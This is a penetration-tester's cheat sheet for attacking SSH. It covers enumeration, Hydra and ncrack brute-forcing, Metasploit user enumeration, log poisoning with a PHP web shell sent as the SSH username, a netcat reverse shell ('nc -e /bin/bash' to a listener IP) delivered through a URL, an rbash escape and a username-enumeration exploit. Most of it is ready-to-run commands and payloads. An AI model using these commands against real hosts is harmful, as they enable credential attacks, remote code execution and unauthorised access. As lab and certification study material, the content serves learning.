SSH 22

SSH Enumeration and assorted commands

#Checklist

Check for SSH version vulns
Check for User enum 
Check if host key was seen somewhere else 
Check if it prompts for a password - means password login is allowed for some users
nmap -sV --script=ssh-hostkey -p22 10.10.10.10
Bruteforce if necessary with CeWL, Hydra, Patator, Crowbar,

#Sysadmin shit

check ssh status >>>> sudo service ssh status

Start ssh server >>>> sudo service ssh start

Stop ssh server >>>> sudo service ssh stop

Restart ssh server >>>> sudo service ssh restart

netstat -tulpn | grep sshd >>>> (check is ssh is running and in which ports)

#If you find private keys:

sudo chmod 600 keys (not 777)
ssh -i key target@10.10.10.10 22

#Generate private keys

ssh-keygen -t rsa

#Banner Grabbing

nc -vn 192.168.101.158 22

#NMAP SSH scripts

ls -lh /usr/share/nmap/scripts/ssh
sudo nmap 10.11.1.71 -p 22 -sV --script=ssh-hostkey   # hostkey script

#ssh-keyscan

ssh-keyscan -t rsa -p 22 192.168.101.158

#Hydra bruteforcing

sudo hydra -l admin -P rockyou.txt -v 192.168.101.133 ssh -s 22 -t 4

Good password list:

/usr/share/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt

#NCRACK

Push comes to shove use ncrack to bruteforce:

ncrack -p 22 --user root -P ./passwords.txt 10.5.23.0/24

#Metasploit scanner

Metasploit Enumerating users (useful to enumerate target for future cracking)

use auxiliary/ssh/ssh_enumusers
set rhost 10.10.10.10 
set rport 22 
set threads 1 
set threshold 5 
run

#SSH Log poisoning

Presupposes both an open ssh port and an RCE vuln

1)kali

ssh ''@10.10.10.10 (target IP)

2)Target URL

http://10.10.10.10/search.php?id=/var/log/auth.log&cmd=ls -la

#Revshell

http://10.10.10.10/search.php?id=/var/log/auth.log&cmd=nc -e /bin/bash 192.168.101.95 1234

#Escaping Rbash

sudo ssh user@192.168.101.173 -t "bash --noprofile"

#RCE via SSH Try to ssh into the box with PHP code as username

ssh <?php system($_GET["cmd"]);?>@10.10.10.10

#Then include the SSH log files inside the web application

#Vulnerable Versions: 7.2p1 | append command and get execution

ssh -v user@10.10.1.111 id

Password:
debug1: Authentication succeeded (keyboard-interactive).
Authenticated to 10.10.1.111 ([10.10.1.1114]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: Sending command: id
debug1: client_input_channel_req: channel 0 rtype exit-status reply 0
debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0
uid=1000(user) gid=100(users) groups=100(users)
debug1: channel 0: free: client-session, nchannels 1
Transferred: sent 2412, received 2480 bytes, in 0.1 seconds

#Force Auth method

ssh -v 10.10.1.111 -o PreferredAuthentications=password

#Linux with OpenSSH < 7.7

cve-2018-15473/ssh-username-enum.py at master · epi052/cve-2018-15473GitHub

#Usage  --> python ssh-username-enum.py 10.10.10.10 -w usernames.txt